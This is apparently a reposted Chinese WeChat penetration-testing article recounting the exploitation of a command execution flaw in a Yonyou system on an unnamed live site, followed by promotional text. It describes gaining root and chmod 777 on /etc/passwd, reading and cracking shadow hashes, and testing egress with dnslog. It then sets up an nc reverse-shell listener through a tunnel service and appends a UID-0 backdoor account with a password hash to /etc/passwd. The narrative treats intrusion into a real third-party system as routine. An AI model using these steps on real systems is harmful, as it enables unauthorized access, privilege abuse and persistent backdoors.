渗透测试 | 一次实战远程命令执行漏洞并提权
2022-11-13 21:16:59
Author: 渗透安全团队(查看原文)
阅读量:11
收藏
某站用友的命令执行漏洞,测试print hello发现可以执行命令
whami 和id 都查一波权限,发现是root,权限这么大,很好搞啊
ps -ef|grep sshd 查一波 发现可以ssh连接,直接useradd 用户,但是整个shell无法给用户添加密码,无法远程登录,怎么搞,直接读shadow哈希,爆破密码爆破无结果,头大,怎么搞,思考5分钟,可以直接写passwd啊,试一波再次查看shadow 居然没写进去,难道权限不对,ls -alrt /etc/passwd 发现权限是544 ,直接chmod 777 /etc/passwd 改权限,继续写,依然写不进去,换了各种姿势,都不行,难住我了,突然想起了nc反弹,一般linux都装有nc,这个有没有,查一波果然不错,有nc,通过dnslog查一下是否有外连能ping通,果然能外连,那就可以通过nc反弹搞一波了,本地的攻击机在内网,内网穿透一波我一般用https://www.uulap.com/ 大家可以试试本地建立监听 nc -l -n -v -p 6666echo ‘用户名:LRxM3nP3LOiYU:0:0:hello:/root:/bin/bash’ >> /etc/passwd查看已经添加成功文章转自巡安似海
转发公众号本文到朋友圈
截图到公众号后台第1、3、5名获取免费进入星球
欢 迎 加 入 星 球 !
代码审计+各类渗透小白学习资源+各种资料文档+各种工具
关注下方公众号回复“666”可以领取一套精品渗透测试工具集和百度云视频链接。 还在等什么?赶紧点击下方名片关注学习吧!
文章来源: http://mp.weixin.qq.com/s?__biz=MzkxNDAyNTY2NA==&mid=2247494494&idx=2&sn=6f98713f29f16d9f99bcdde718891a33&chksm=c17616f1f6019fe7d0c4b13358a9b7bd6057f25e78059cf26decaecf93bb1150435d4d860f47#rd
如有侵权请联系:admin#unsafe.sh